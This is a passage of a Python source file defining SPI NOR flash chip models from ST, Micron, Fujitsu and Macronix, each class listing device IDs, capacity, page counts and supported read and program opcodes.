total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX32_S1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x6316
name = "m25px32-s1"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7117
name = "m25px64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7114
name = "m25px80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M45PE10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x4011
name = "m45pe10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M45PE16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x4015
name = "m45pe16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M45PE20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x4012
name = "m45pe20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M45PE40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x4013
name = "m45pe40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M45PE80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x4014
name = "m45pe80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M95M02(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x0012
name = "m95m02"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MB85RS1MT(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.FUJITSU
device_id = 0x7f27
name = "mb85rs1mt"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MR25H10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "mr25h10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MR25H128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "mr25h128"
total_size = 16384 # bytes
page_size = 256 # bytes
total_pages = 64
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MR25H256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "mr25h256"
total_size = 32768 # bytes
page_size = 256 # bytes
total_pages = 128
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MR25H40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "mr25h40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MT25QL01(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba21
name = "mt25ql01"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MT25QL01G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba21
name = "mt25ql01g"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QL02(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba22
name = "mt25ql02"
total_size = 268435456 # bytes
page_size = 256 # bytes
total_pages = 1048576
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MT25QL02G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba22
name = "mt25ql02g"
total_size = 268435456 # bytes
page_size = 256 # bytes
total_pages = 1048576
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MT25QL128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba18
name = "mt25ql128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QL256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba19
name = "mt25ql256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QL256A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba19
name = "mt25ql256a"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MT25QL512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba20
name = "mt25ql512"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QL512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba20
name = "mt25ql512a"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MT25QU01G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb21
name = "mt25qu01g"
total_size = 134217728 # bytes
page_size = 256 # bytes
total_pages = 524288
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QU02G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb22
name = "mt25qu02g"
total_size = 268435456 # bytes
page_size = 256 # bytes
total_pages = 1048576
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MT25QU128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb18
name = "mt25qu128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QU256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb19
name = "mt25qu256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QU256A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb19
name = "mt25qu256a"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MT25QU512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb20
name = "mt25qu512"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MT25QU512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb20
name = "mt25qu512a"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class MT35XU02G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MICRON
device_id = 0x5b1c
name = "mt35xu02g"
total_size = 268435456 # bytes
page_size = 256 # bytes
total_pages = 1048576
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_8,
SpiNorFlashOpCodes.PP_1_1_8,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_8_4B,
SpiNorFlashOpCodes.PP_1_1_8_4B,
]
dummy_bits = 8
class MT35XU512ABA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MICRON
device_id = 0x5b1a
name = "mt35xu512aba"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_8,
SpiNorFlashOpCodes.PP_1_1_8,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_8_4B,
SpiNorFlashOpCodes.PP_1_1_8_4B,
]
dummy_bits = 8
class MX23L12854(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x0518
name = "mx23l12854"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX23L1654(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x0515
name = "mx23l1654"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX23L3254(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x0516
name = "mx23l3254"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX23L6454(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x0517
name = "mx23l6454"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2011
name = "mx25l1005"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1005C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2011
name = "mx25l1005c"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2011
name = "mx25l1006e"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L12805D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2018
name = "mx25l12805d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L12835F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2018
name = "mx25l12835f"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L12845(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2018
name = "mx25l12845"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L12845E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2018
name = "mx25l12845e"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L12855E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2618
name = "mx25l12855e"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L12865E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2018
name = "mx25l12865e"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1605(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2015
name = "mx25l1605"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1605D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2015
name = "mx25l1605d"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1606E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2015
name = "mx25l1606e"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L1608D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2015
name = "mx25l1608d"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1635D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2415
name = "mx25l1635d"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1635E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2515
name = "mx25l1635e"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L1673E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2015
name = "mx25l1673e"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L2005(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2012
name = "mx25l2005"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L2005A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2012
name = "mx25l2005a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L2005C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2012
name = "mx25l2005c"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L2006E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2012
name = "mx25l2006e"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L25635E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2019
name = "mx25l25635e"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class MX25L25635F(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2019
name = "mx25l25635f"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX25L25645(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2019
name = "mx25l25645"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L25645G(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2019
name = "mx25l25645g"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class MX25L25655E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2619
name = "mx25l25655e"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L3205(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2016
name = "mx25l3205"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L3205D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x2016
name = "mx25l3205d"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class MX25L3235D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x5e16
name = "mx25l3235d"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class MX25L3255E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.MACRONIX
device_id = 0x9e16
name = "mx25l3255e"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
